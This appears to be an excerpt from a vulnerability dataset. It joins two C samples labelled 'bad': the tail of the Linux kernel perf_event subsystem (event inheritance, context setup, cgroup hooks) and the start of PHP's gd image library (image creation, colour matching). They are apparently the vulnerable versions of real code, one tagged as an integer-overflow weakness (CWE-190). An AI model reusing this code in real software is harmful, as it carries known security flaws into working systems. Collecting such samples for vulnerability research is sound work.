struct perf_event_context *ctx)
{
struct perf_event *parent = event->parent;
if (WARN_ON_ONCE(!parent))
return;
mutex_lock(&parent->child_mutex);
list_del_init(&event->child_list);
mutex_unlock(&parent->child_mutex);
put_event(parent);
raw_spin_lock_irq(&ctx->lock);
perf_group_detach(event);
list_del_event(event, ctx);
raw_spin_unlock_irq(&ctx->lock);
free_event(event);
}
/*
* Free an unexposed, unused context as created by inheritance by
* perf_event_init_task below, used by fork() in case of failure.
*
* Not all locks are strictly required, but take them anyway to be nice and
* help out with the lockdep assertions.
*/
void perf_event_free_task(struct task_struct *task)
{
struct perf_event_context *ctx;
struct perf_event *event, *tmp;
int ctxn;
for_each_task_context_nr(ctxn) {
ctx = task->perf_event_ctxp[ctxn];
if (!ctx)
continue;
mutex_lock(&ctx->mutex);
again:
list_for_each_entry_safe(event, tmp, &ctx->pinned_groups,
group_entry)
perf_free_event(event, ctx);
list_for_each_entry_safe(event, tmp, &ctx->flexible_groups,
group_entry)
perf_free_event(event, ctx);
if (!list_empty(&ctx->pinned_groups) ||
!list_empty(&ctx->flexible_groups))
goto again;
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
}
}
void perf_event_delayed_put(struct task_struct *task)
{
int ctxn;
for_each_task_context_nr(ctxn)
WARN_ON_ONCE(task->perf_event_ctxp[ctxn]);
}
struct file *perf_event_get(unsigned int fd)
{
struct file *file;
file = fget_raw(fd);
if (!file)
return ERR_PTR(-EBADF);
if (file->f_op != &perf_fops) {
fput(file);
return ERR_PTR(-EBADF);
}
return file;
}
const struct perf_event_attr *perf_event_attrs(struct perf_event *event)
{
if (!event)
return ERR_PTR(-EINVAL);
return &event->attr;
}
/*
* inherit an event from parent task to child task:
*/
static struct perf_event *
inherit_event(struct perf_event *parent_event,
struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child,
struct perf_event *group_leader,
struct perf_event_context *child_ctx)
{
enum perf_event_active_state parent_state = parent_event->state;
struct perf_event *child_event;
unsigned long flags;
/*
* Instead of creating recursive hierarchies of events,
* we link inherited events back to the original parent,
* which has a filp for sure, which we use as the reference
* count:
*/
if (parent_event->parent)
parent_event = parent_event->parent;
child_event = perf_event_alloc(&parent_event->attr,
parent_event->cpu,
child,
group_leader, parent_event,
NULL, NULL, -1);
if (IS_ERR(child_event))
return child_event;
/*
* is_orphaned_event() and list_add_tail(&parent_event->child_list)
* must be under the same lock in order to serialize against
* perf_event_release_kernel(), such that either we must observe
* is_orphaned_event() or they will observe us on the child_list.
*/
mutex_lock(&parent_event->child_mutex);
if (is_orphaned_event(parent_event) ||
!atomic_long_inc_not_zero(&parent_event->refcount)) {
mutex_unlock(&parent_event->child_mutex);
free_event(child_event);
return NULL;
}
get_ctx(child_ctx);
/*
* Make the child state follow the state of the parent event,
* not its attr.disabled bit. We hold the parent's mutex,
* so we won't race with perf_event_{en, dis}able_family.
*/
if (parent_state >= PERF_EVENT_STATE_INACTIVE)
child_event->state = PERF_EVENT_STATE_INACTIVE;
else
child_event->state = PERF_EVENT_STATE_OFF;
if (parent_event->attr.freq) {
u64 sample_period = parent_event->hw.sample_period;
struct hw_perf_event *hwc = &child_event->hw;
hwc->sample_period = sample_period;
hwc->last_period = sample_period;
local64_set(&hwc->period_left, sample_period);
}
child_event->ctx = child_ctx;
child_event->overflow_handler = parent_event->overflow_handler;
child_event->overflow_handler_context
= parent_event->overflow_handler_context;
/*
* Precalculate sample_data sizes
*/
perf_event__header_size(child_event);
perf_event__id_header_size(child_event);
/*
* Link it up in the child's context:
*/
raw_spin_lock_irqsave(&child_ctx->lock, flags);
add_event_to_ctx(child_event, child_ctx);
raw_spin_unlock_irqrestore(&child_ctx->lock, flags);
/*
* Link this into the parent event's child list
*/
list_add_tail(&child_event->child_list, &parent_event->child_list);
mutex_unlock(&parent_event->child_mutex);
return child_event;
}
static int inherit_group(struct perf_event *parent_event,
struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child,
struct perf_event_context *child_ctx)
{
struct perf_event *leader;
struct perf_event *sub;
struct perf_event *child_ctr;
leader = inherit_event(parent_event, parent, parent_ctx,
child, NULL, child_ctx);
if (IS_ERR(leader))
return PTR_ERR(leader);
list_for_each_entry(sub, &parent_event->sibling_list, group_entry) {
child_ctr = inherit_event(sub, parent, parent_ctx,
child, leader, child_ctx);
if (IS_ERR(child_ctr))
return PTR_ERR(child_ctr);
}
return 0;
}
static int
inherit_task_group(struct perf_event *event, struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child, int ctxn,
int *inherited_all)
{
int ret;
struct perf_event_context *child_ctx;
if (!event->attr.inherit) {
*inherited_all = 0;
return 0;
}
child_ctx = child->perf_event_ctxp[ctxn];
if (!child_ctx) {
/*
* This is executed from the parent task context, so
* inherit events that have been marked for cloning.
* First allocate and initialize a context for the
* child.
*/
child_ctx = alloc_perf_context(parent_ctx->pmu, child);
if (!child_ctx)
return -ENOMEM;
child->perf_event_ctxp[ctxn] = child_ctx;
}
ret = inherit_group(event, parent, parent_ctx,
child, child_ctx);
if (ret)
*inherited_all = 0;
return ret;
}
/*
* Initialize the perf_event context in task_struct
*/
static int perf_event_init_context(struct task_struct *child, int ctxn)
{
struct perf_event_context *child_ctx, *parent_ctx;
struct perf_event_context *cloned_ctx;
struct perf_event *event;
struct task_struct *parent = current;
int inherited_all = 1;
unsigned long flags;
int ret = 0;
if (likely(!parent->perf_event_ctxp[ctxn]))
return 0;
/*
* If the parent's context is a clone, pin it so it won't get
* swapped under us.
*/
parent_ctx = perf_pin_task_context(parent, ctxn);
if (!parent_ctx)
return 0;
/*
* No need to check if parent_ctx != NULL here; since we saw
* it non-NULL earlier, the only reason for it to become NULL
* is if we exit, and since we're currently in the middle of
* a fork we can't be exiting at the same time.
*/
/*
* Lock the parent list. No need to lock the child - not PID
* hashed yet and not running, so nobody can access it.
*/
mutex_lock(&parent_ctx->mutex);
/*
* We don't have to disable NMIs - we are only looking at
* the list, not manipulating it:
*/
list_for_each_entry(event, &parent_ctx->pinned_groups, group_entry) {
ret = inherit_task_group(event, parent, parent_ctx,
child, ctxn, &inherited_all);
if (ret)
break;
}
/*
* We can't hold ctx->lock when iterating the ->flexible_group list due
* to allocations, but we need to prevent rotation because
* rotate_ctx() will change the list from interrupt context.
*/
raw_spin_lock_irqsave(&parent_ctx->lock, flags);
parent_ctx->rotate_disable = 1;
raw_spin_unlock_irqrestore(&parent_ctx->lock, flags);
list_for_each_entry(event, &parent_ctx->flexible_groups, group_entry) {
ret = inherit_task_group(event, parent, parent_ctx,
child, ctxn, &inherited_all);
if (ret)
break;
}
raw_spin_lock_irqsave(&parent_ctx->lock, flags);
parent_ctx->rotate_disable = 0;
child_ctx = child->perf_event_ctxp[ctxn];
if (child_ctx && inherited_all) {
/*
* Mark the child context as a clone of the parent
* context, or of whatever the parent is a clone of.
*
* Note that if the parent is a clone, the holding of
* parent_ctx->lock prevents it from being uncloned.
*/
cloned_ctx = parent_ctx->parent_ctx;
if (cloned_ctx) {
child_ctx->parent_ctx = cloned_ctx;
child_ctx->parent_gen = parent_ctx->parent_gen;
} else {
child_ctx->parent_ctx = parent_ctx;
child_ctx->parent_gen = parent_ctx->generation;
}
get_ctx(child_ctx->parent_ctx);
}
raw_spin_unlock_irqrestore(&parent_ctx->lock, flags);
mutex_unlock(&parent_ctx->mutex);
perf_unpin_context(parent_ctx);
put_ctx(parent_ctx);
return ret;
}
/*
* Initialize the perf_event context in task_struct
*/
int perf_event_init_task(struct task_struct *child)
{
int ctxn, ret;
memset(child->perf_event_ctxp, 0, sizeof(child->perf_event_ctxp));
mutex_init(&child->perf_event_mutex);
INIT_LIST_HEAD(&child->perf_event_list);
for_each_task_context_nr(ctxn) {
ret = perf_event_init_context(child, ctxn);
if (ret) {
perf_event_free_task(child);
return ret;
}
}
return 0;
}
static void __init perf_event_init_all_cpus(void)
{
struct swevent_htable *swhash;
int cpu;
for_each_possible_cpu(cpu) {
swhash = &per_cpu(swevent_htable, cpu);
mutex_init(&swhash->hlist_mutex);
INIT_LIST_HEAD(&per_cpu(active_ctx_list, cpu));
INIT_LIST_HEAD(&per_cpu(pmu_sb_events.list, cpu));
raw_spin_lock_init(&per_cpu(pmu_sb_events.lock, cpu));
#ifdef CONFIG_CGROUP_PERF
INIT_LIST_HEAD(&per_cpu(cgrp_cpuctx_list, cpu));
#endif
INIT_LIST_HEAD(&per_cpu(sched_cb_list, cpu));
}
}
int perf_event_init_cpu(unsigned int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
mutex_lock(&swhash->hlist_mutex);
if (swhash->hlist_refcount > 0 && !swevent_hlist_deref(swhash)) {
struct swevent_hlist *hlist;
hlist = kzalloc_node(sizeof(*hlist), GFP_KERNEL, cpu_to_node(cpu));
WARN_ON(!hlist);
rcu_assign_pointer(swhash->swevent_hlist, hlist);
}
mutex_unlock(&swhash->hlist_mutex);
return 0;
}
#if defined CONFIG_HOTPLUG_CPU || defined CONFIG_KEXEC_CORE
static void __perf_event_exit_context(void *__info)
{
struct perf_event_context *ctx = __info;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event *event;
raw_spin_lock(&ctx->lock);
list_for_each_entry(event, &ctx->event_list, event_entry)
__perf_remove_from_context(event, cpuctx, ctx, (void *)DETACH_GROUP);
raw_spin_unlock(&ctx->lock);
}
static void perf_event_exit_cpu_context(int cpu)
{
struct perf_event_context *ctx;
struct pmu *pmu;
int idx;
idx = srcu_read_lock(&pmus_srcu);
list_for_each_entry_rcu(pmu, &pmus, entry) {
ctx = &per_cpu_ptr(pmu->pmu_cpu_context, cpu)->ctx;
mutex_lock(&ctx->mutex);
smp_call_function_single(cpu, __perf_event_exit_context, ctx, 1);
mutex_unlock(&ctx->mutex);
}
srcu_read_unlock(&pmus_srcu, idx);
}
#else
static void perf_event_exit_cpu_context(int cpu) { }
#endif
int perf_event_exit_cpu(unsigned int cpu)
{
perf_event_exit_cpu_context(cpu);
return 0;
}
static int
perf_reboot(struct notifier_block *notifier, unsigned long val, void *v)
{
int cpu;
for_each_online_cpu(cpu)
perf_event_exit_cpu(cpu);
return NOTIFY_OK;
}
/*
* Run the perf reboot notifier at the very last possible moment so that
* the generic watchdog code runs as long as possible.
*/
static struct notifier_block perf_reboot_notifier = {
.notifier_call = perf_reboot,
.priority = INT_MIN,
};
void __init perf_event_init(void)
{
int ret;
idr_init(&pmu_idr);
perf_event_init_all_cpus();
init_srcu_struct(&pmus_srcu);
perf_pmu_register(&perf_swevent, "software", PERF_TYPE_SOFTWARE);
perf_pmu_register(&perf_cpu_clock, NULL, -1);
perf_pmu_register(&perf_task_clock, NULL, -1);
perf_tp_register();
perf_event_init_cpu(smp_processor_id());
register_reboot_notifier(&perf_reboot_notifier);
ret = init_hw_breakpoint();
WARN(ret, "hw_breakpoint initialization failed with: %d", ret);
/*
* Build time assertion that we keep the data_head at the intended
* location. IOW, validating that we got the __reserved[] size right.
*/
BUILD_BUG_ON((offsetof(struct perf_event_mmap_page, data_head))
!= 1024);
}
ssize_t perf_event_sysfs_show(struct device *dev, struct device_attribute *attr,
char *page)
{
struct perf_pmu_events_attr *pmu_attr =
container_of(attr, struct perf_pmu_events_attr, attr);
if (pmu_attr->event_str)
return sprintf(page, "%s\n", pmu_attr->event_str);
return 0;
}
EXPORT_SYMBOL_GPL(perf_event_sysfs_show);
static int __init perf_event_sysfs_init(void)
{
struct pmu *pmu;
int ret;
mutex_lock(&pmus_lock);
ret = bus_register(&pmu_bus);
if (ret)
goto unlock;
list_for_each_entry(pmu, &pmus, entry) {
if (!pmu->name || pmu->type < 0)
continue;
ret = pmu_dev_alloc(pmu);
WARN(ret, "Failed to register pmu: %s, reason %d\n", pmu->name, ret);
}
pmu_bus_running = 1;
ret = 0;
unlock:
mutex_unlock(&pmus_lock);
return ret;
}
device_initcall(perf_event_sysfs_init);
#ifdef CONFIG_CGROUP_PERF
static struct cgroup_subsys_state *
perf_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
{
struct perf_cgroup *jc;
jc = kzalloc(sizeof(*jc), GFP_KERNEL);
if (!jc)
return ERR_PTR(-ENOMEM);
jc->info = alloc_percpu(struct perf_cgroup_info);
if (!jc->info) {
kfree(jc);
return ERR_PTR(-ENOMEM);
}
return &jc->css;
}
static void perf_cgroup_css_free(struct cgroup_subsys_state *css)
{
struct perf_cgroup *jc = container_of(css, struct perf_cgroup, css);
free_percpu(jc->info);
kfree(jc);
}
static int __perf_cgroup_move(void *info)
{
struct task_struct *task = info;
rcu_read_lock();
perf_cgroup_switch(task, PERF_CGROUP_SWOUT | PERF_CGROUP_SWIN);
rcu_read_unlock();
return 0;
}
static void perf_cgroup_attach(struct cgroup_taskset *tset)
{
struct task_struct *task;
struct cgroup_subsys_state *css;
cgroup_taskset_for_each(task, css, tset)
task_function_call(task, __perf_cgroup_move, task);
}
struct cgroup_subsys perf_event_cgrp_subsys = {
.css_alloc = perf_cgroup_css_alloc,
.css_free = perf_cgroup_css_free,
.attach = perf_cgroup_attach,
};
#endif /* CONFIG_CGROUP_PERF */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3027_0 |
crossvul-cpp_data_bad_5167_1 |
#include <math.h>
#include <string.h>
#include <stdlib.h>
#include "gd.h"
#include "gdhelpers.h"
#include "php.h"
#ifdef _MSC_VER
# if _MSC_VER >= 1300
/* in MSVC.NET these are available but only for __cplusplus and not _MSC_EXTENSIONS */
# if !defined(_MSC_EXTENSIONS) && defined(__cplusplus)
# define HAVE_FABSF 1
extern float fabsf(float x);
# define HAVE_FLOORF 1
extern float floorf(float x);
# endif /*MSVC.NET */
# endif /* MSC */
#endif
#ifndef HAVE_FABSF
# define HAVE_FABSF 0
#endif
#ifndef HAVE_FLOORF
# define HAVE_FLOORF 0
#endif
#if HAVE_FABSF == 0
/* float fabsf(float x); */
# ifndef fabsf
# define fabsf(x) ((float)(fabs(x)))
# endif
#endif
#if HAVE_FLOORF == 0
# ifndef floorf
/* float floorf(float x);*/
# define floorf(x) ((float)(floor(x)))
# endif
#endif
#ifdef _OSD_POSIX /* BS2000 uses the EBCDIC char set instead of ASCII */
#define CHARSET_EBCDIC
#define __attribute__(any) /*nothing */
#endif
/*_OSD_POSIX*/
#ifndef CHARSET_EBCDIC
#define ASC(ch) ch
#else /*CHARSET_EBCDIC */
#define ASC(ch) gd_toascii[(unsigned char)ch]
static const unsigned char gd_toascii[256] =
{
/*00 */ 0x00, 0x01, 0x02, 0x03, 0x85, 0x09, 0x86, 0x7f,
0x87, 0x8d, 0x8e, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /*................ */
/*10 */ 0x10, 0x11, 0x12, 0x13, 0x8f, 0x0a, 0x08, 0x97,
0x18, 0x19, 0x9c, 0x9d, 0x1c, 0x1d, 0x1e, 0x1f, /*................ */
/*20 */ 0x80, 0x81, 0x82, 0x83, 0x84, 0x92, 0x17, 0x1b,
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x05, 0x06, 0x07, /*................ */
/*30 */ 0x90, 0x91, 0x16, 0x93, 0x94, 0x95, 0x96, 0x04,
0x98, 0x99, 0x9a, 0x9b, 0x14, 0x15, 0x9e, 0x1a, /*................ */
/*40 */ 0x20, 0xa0, 0xe2, 0xe4, 0xe0, 0xe1, 0xe3, 0xe5,
0xe7, 0xf1, 0x60, 0x2e, 0x3c, 0x28, 0x2b, 0x7c, /* .........`.<(+| */
/*50 */ 0x26, 0xe9, 0xea, 0xeb, 0xe8, 0xed, 0xee, 0xef,
0xec, 0xdf, 0x21, 0x24, 0x2a, 0x29, 0x3b, 0x9f, /*&.........!$*);. */
/*60 */ 0x2d, 0x2f, 0xc2, 0xc4, 0xc0, 0xc1, 0xc3, 0xc5,
0xc7, 0xd1, 0x5e, 0x2c, 0x25, 0x5f, 0x3e, 0x3f,
/*-/........^,%_>?*/
/*70 */ 0xf8, 0xc9, 0xca, 0xcb, 0xc8, 0xcd, 0xce, 0xcf,
0xcc, 0xa8, 0x3a, 0x23, 0x40, 0x27, 0x3d, 0x22, /*..........:#@'=" */
/*80 */ 0xd8, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x69, 0xab, 0xbb, 0xf0, 0xfd, 0xfe, 0xb1, /*.abcdefghi...... */
/*90 */ 0xb0, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70,
0x71, 0x72, 0xaa, 0xba, 0xe6, 0xb8, 0xc6, 0xa4, /*.jklmnopqr...... */
/*a0 */ 0xb5, 0xaf, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
0x79, 0x7a, 0xa1, 0xbf, 0xd0, 0xdd, 0xde, 0xae, /*..stuvwxyz...... */
/*b0 */ 0xa2, 0xa3, 0xa5, 0xb7, 0xa9, 0xa7, 0xb6, 0xbc,
0xbd, 0xbe, 0xac, 0x5b, 0x5c, 0x5d, 0xb4, 0xd7, /*...........[\].. */
/*c0 */ 0xf9, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
0x48, 0x49, 0xad, 0xf4, 0xf6, 0xf2, 0xf3, 0xf5, /*.ABCDEFGHI...... */
/*d0 */ 0xa6, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, 0x50,
0x51, 0x52, 0xb9, 0xfb, 0xfc, 0xdb, 0xfa, 0xff, /*.JKLMNOPQR...... */
/*e0 */ 0xd9, 0xf7, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
0x59, 0x5a, 0xb2, 0xd4, 0xd6, 0xd2, 0xd3, 0xd5, /*..STUVWXYZ...... */
/*f0 */ 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0xb3, 0x7b, 0xdc, 0x7d, 0xda, 0x7e /*0123456789.{.}.~ */
};
#endif /*CHARSET_EBCDIC */
/* 2.0.10: cast instead of floor() yields 35% performance improvement. Thanks to John Buckman. */
#define floor_cast(exp) ((long) exp)
extern int gdCosT[];
extern int gdSinT[];
static void gdImageBrushApply(gdImagePtr im, int x, int y);
static void gdImageTileApply(gdImagePtr im, int x, int y);
static void gdImageAntiAliasedApply(gdImagePtr im, int x, int y);
static int gdLayerOverlay(int dst, int src);
static int gdAlphaOverlayColor(int src, int dst, int max);
int gdImageGetTrueColorPixel(gdImagePtr im, int x, int y);
void php_gd_error_ex(int type, const char *format, ...)
{
va_list args;
TSRMLS_FETCH();
va_start(args, format);
php_verror(NULL, "", type, format, args TSRMLS_CC);
va_end(args);
}
void php_gd_error(const char *format, ...)
{
va_list args;
TSRMLS_FETCH();
va_start(args, format);
php_verror(NULL, "", E_WARNING, format, args TSRMLS_CC);
va_end(args);
}
gdImagePtr gdImageCreate (int sx, int sy)
{
int i;
gdImagePtr im;
if (overflow2(sx, sy)) {
return NULL;
}
if (overflow2(sizeof(unsigned char *), sy)) {
return NULL;
}
im = (gdImage *) gdCalloc(1, sizeof(gdImage));
/* Row-major ever since gd 1.3 */
im->pixels = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->AA_opacity = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->polyInts = 0;
im->polyAllocated = 0;
im->brush = 0;
im->tile = 0;
im->style = 0;
for (i = 0; i < sy; i++) {
/* Row-major ever since gd 1.3 */
im->pixels[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
im->AA_opacity[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
}
im->sx = sx;
im->sy = sy;
im->colorsTotal = 0;
im->transparent = (-1);
im->interlace = 0;
im->thick = 1;
im->AA = 0;
im->AA_polygon = 0;
for (i = 0; i < gdMaxColors; i++) {
im->open[i] = 1;
im->red[i] = 0;
im->green[i] = 0;
im->blue[i] = 0;
}
im->trueColor = 0;
im->tpixels = 0;
im->cx1 = 0;
im->cy1 = 0;
im->cx2 = im->sx - 1;
im->cy2 = im->sy - 1;
im->interpolation = NULL;
im->interpolation_id = GD_BILINEAR_FIXED;
return im;
}
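/*
* Rough usage sketch for the palette constructor above; the dimensions
* and colour values are arbitrary. Note that the first colour allocated
* on a palette image becomes its background:
*
* gdImagePtr im = gdImageCreate(64, 64);
* if (im) {
* int white = gdImageColorAllocate(im, 255, 255, 255);
* int black = gdImageColorAllocate(im, 0, 0, 0);
* gdImageLine(im, 0, 0, 63, 63, black);
* gdImageDestroy(im);
* }
*/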
gdImagePtr gdImageCreateTrueColor (int sx, int sy)
{
int i;
gdImagePtr im;
if (overflow2(sx, sy)) {
return NULL;
}
if (overflow2(sizeof(unsigned char *), sy)) {
return NULL;
}
if (overflow2(sizeof(int), sx)) {
return NULL;
}
im = (gdImage *) gdMalloc(sizeof(gdImage));
memset(im, 0, sizeof(gdImage));
im->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
im->AA_opacity = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->polyInts = 0;
im->polyAllocated = 0;
im->brush = 0;
im->tile = 0;
im->style = 0;
for (i = 0; i < sy; i++) {
im->tpixels[i] = (int *) gdCalloc(sx, sizeof(int));
im->AA_opacity[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
}
im->sx = sx;
im->sy = sy;
im->transparent = (-1);
im->interlace = 0;
im->trueColor = 1;
/* 2.0.2: alpha blending is now on by default, and saving of alpha is
* off by default. This allows font antialiasing to work as expected
* on the first try in JPEGs -- quite important -- and also allows
* for smaller PNGs when saving of alpha channel is not really
* desired, which it usually isn't!
*/
im->saveAlphaFlag = 0;
im->alphaBlendingFlag = 1;
im->thick = 1;
im->AA = 0;
im->AA_polygon = 0;
im->cx1 = 0;
im->cy1 = 0;
im->cx2 = im->sx - 1;
im->cy2 = im->sy - 1;
im->interpolation = NULL;
im->interpolation_id = GD_BILINEAR_FIXED;
return im;
}
void gdImageDestroy (gdImagePtr im)
{
int i;
if (im->pixels) {
for (i = 0; i < im->sy; i++) {
gdFree(im->pixels[i]);
}
gdFree(im->pixels);
}
if (im->tpixels) {
for (i = 0; i < im->sy; i++) {
gdFree(im->tpixels[i]);
}
gdFree(im->tpixels);
}
if (im->AA_opacity) {
for (i = 0; i < im->sy; i++) {
gdFree(im->AA_opacity[i]);
}
gdFree(im->AA_opacity);
}
if (im->polyInts) {
gdFree(im->polyInts);
}
if (im->style) {
gdFree(im->style);
}
gdFree(im);
}
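/* Illustrative usage sketch (not part of the library, kept under #if 0):
 * create a truecolor canvas, draw one line, and free it.
 * gdImageCreateTrueColor may return NULL when the size checks above fail,
 * so callers should test the result before drawing.
 */
#if 0
{
gdImagePtr im = gdImageCreateTrueColor(64, 64);
if (im) {
int red = gdTrueColorAlpha(255, 0, 0, gdAlphaOpaque);
gdImageLine(im, 0, 0, 63, 63, red);
gdImageDestroy(im);
}
}
#endif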
int gdImageColorClosest (gdImagePtr im, int r, int g, int b)
{
return gdImageColorClosestAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorClosestAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
long rd, gd, bd, ad;
int ct = (-1);
int first = 1;
long mindist = 0;
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
long dist;
if (im->open[i]) {
continue;
}
rd = im->red[i] - r;
gd = im->green[i] - g;
bd = im->blue[i] - b;
/* gd 2.02: whoops, was - b (thanks to David Marwood) */
ad = im->alpha[i] - a;
dist = rd * rd + gd * gd + bd * bd + ad * ad;
if (first || (dist < mindist)) {
mindist = dist;
ct = i;
first = 0;
}
}
return ct;
}
/* This code is taken from http://www.acm.org/jgt/papers/SmithLyons96/hwb_rgb.html, an article
 * on colour conversion to/from the RGB and HWB colour systems.
 * It has been modified to return the converted value via a pointer parameter.
 */
#define RETURN_HWB(h, w, b) {HWB->H = h; HWB->W = w; HWB->B = b; return HWB;}
#define RETURN_RGB(r, g, b) {RGB->R = r; RGB->G = g; RGB->B = b; return RGB;}
#define HWB_UNDEFINED -1
#define SETUP_RGB(s, r, g, b) {s.R = r/255.0f; s.G = g/255.0f; s.B = b/255.0f;}
#ifndef MIN
#define MIN(a,b) ((a)<(b)?(a):(b))
#endif
#define MIN3(a,b,c) ((a)<(b)?(MIN(a,c)):(MIN(b,c)))
#ifndef MAX
#define MAX(a,b) ((a)<(b)?(b):(a))
#endif
#define MAX3(a,b,c) ((a)<(b)?(MAX(b,c)):(MAX(a,c)))
/*
* Theoretically, hue 0 (pure red) is identical to hue 6 in these transforms. Pure
* red always maps to 6 in this implementation. Therefore UNDEFINED can be
* defined as 0 in situations where only unsigned numbers are desired.
*/
typedef struct
{
float R, G, B;
}
RGBType;
typedef struct
{
float H, W, B;
}
HWBType;
static HWBType * RGB_to_HWB (RGBType RGB, HWBType * HWB)
{
/*
* RGB are each on [0, 1]. W and B are returned on [0, 1] and H is
* returned on [0, 6]. Exception: H is returned UNDEFINED if W == 1 - B.
*/
float R = RGB.R, G = RGB.G, B = RGB.B, w, v, b, f;
int i;
w = MIN3 (R, G, B);
v = MAX3 (R, G, B);
b = 1 - v;
if (v == w) {
RETURN_HWB(HWB_UNDEFINED, w, b);
}
f = (R == w) ? G - B : ((G == w) ? B - R : R - G);
i = (R == w) ? 3 : ((G == w) ? 5 : 1);
RETURN_HWB(i - f / (v - w), w, b);
}
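/* Worked example of the transform above: pure red (R=1, G=0, B=0) gives
 * w = 0, v = 1, b = 0; G == w, so f = B - R = -1 and i = 5, hence
 * H = 5 - (-1)/1 = 6. This matches the note above that pure red always
 * maps to hue 6 in this implementation.
 */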
static float HWB_Diff (int r1, int g1, int b1, int r2, int g2, int b2)
{
RGBType RGB1, RGB2;
HWBType HWB1, HWB2;
float diff;
SETUP_RGB(RGB1, r1, g1, b1);
SETUP_RGB(RGB2, r2, g2, b2);
RGB_to_HWB(RGB1, &HWB1);
RGB_to_HWB(RGB2, &HWB2);
/*
* I made this bit up; it seems to produce OK results, and it is certainly
* more visually correct than the current RGB metric. (PJW)
*/
if ((HWB1.H == HWB_UNDEFINED) || (HWB2.H == HWB_UNDEFINED)) {
diff = 0.0f; /* Undefined hues always match... */
} else {
diff = fabsf(HWB1.H - HWB2.H);
if (diff > 3.0f) {
diff = 6.0f - diff; /* Remember, it's a colour circle */
}
}
diff = diff * diff + (HWB1.W - HWB2.W) * (HWB1.W - HWB2.W) + (HWB1.B - HWB2.B) * (HWB1.B - HWB2.B);
return diff;
}
#if 0
/*
* This is not actually used, but is here for completeness, in case someone wants to
* use the HWB stuff for anything else...
*/
static RGBType * HWB_to_RGB (HWBType HWB, RGBType * RGB)
{
/*
* H is given on [0, 6] or UNDEFINED. W and B are given on [0, 1].
* RGB are each returned on [0, 1].
*/
float h = HWB.H, w = HWB.W, b = HWB.B, v, n, f;
int i;
v = 1 - b;
if (h == HWB_UNDEFINED) {
RETURN_RGB(v, v, v);
}
i = floor(h);
f = h - i;
if (i & 1) {
f = 1 - f; /* if i is odd */
}
n = w + f * (v - w); /* linear interpolation between w and v */
switch (i) {
case 6:
case 0:
RETURN_RGB(v, n, w);
case 1:
RETURN_RGB(n, v, w);
case 2:
RETURN_RGB(w, v, n);
case 3:
RETURN_RGB(w, n, v);
case 4:
RETURN_RGB(n, w, v);
case 5:
RETURN_RGB(v, w, n);
}
return RGB;
}
#endif
int gdImageColorClosestHWB (gdImagePtr im, int r, int g, int b)
{
int i;
/* long rd, gd, bd; */
int ct = (-1);
int first = 1;
float mindist = 0;
if (im->trueColor) {
return gdTrueColor(r, g, b);
}
for (i = 0; i < im->colorsTotal; i++) {
float dist;
if (im->open[i]) {
continue;
}
dist = HWB_Diff(im->red[i], im->green[i], im->blue[i], r, g, b);
if (first || (dist < mindist)) {
mindist = dist;
ct = i;
first = 0;
}
}
return ct;
}
int gdImageColorExact (gdImagePtr im, int r, int g, int b)
{
return gdImageColorExactAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorExactAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
if (im->open[i]) {
continue;
}
if ((im->red[i] == r) && (im->green[i] == g) && (im->blue[i] == b) && (im->alpha[i] == a)) {
return i;
}
}
return -1;
}
int gdImageColorAllocate (gdImagePtr im, int r, int g, int b)
{
return gdImageColorAllocateAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorAllocateAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
int ct = (-1);
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
if (im->open[i]) {
ct = i;
break;
}
}
if (ct == (-1)) {
ct = im->colorsTotal;
if (ct == gdMaxColors) {
return -1;
}
im->colorsTotal++;
}
im->red[ct] = r;
im->green[ct] = g;
im->blue[ct] = b;
im->alpha[ct] = a;
im->open[ct] = 0;
return ct;
}
/*
* gdImageColorResolve is an alternative for the code fragment:
*
* if ((color=gdImageColorExact(im,R,G,B)) < 0)
* if ((color=gdImageColorAllocate(im,R,G,B)) < 0)
* color=gdImageColorClosest(im,R,G,B);
*
* in a single function. Its advantage is that it is guaranteed to
* return a color index in one search over the color table.
*/
int gdImageColorResolve (gdImagePtr im, int r, int g, int b)
{
return gdImageColorResolveAlpha(im, r, g, b, gdAlphaOpaque);
}
int gdImageColorResolveAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int c;
int ct = -1;
int op = -1;
long rd, gd, bd, ad, dist;
long mindist = 4 * 255 * 255; /* init to max poss dist */
if (im->trueColor)
{
return gdTrueColorAlpha (r, g, b, a);
}
for (c = 0; c < im->colorsTotal; c++)
{
if (im->open[c])
{
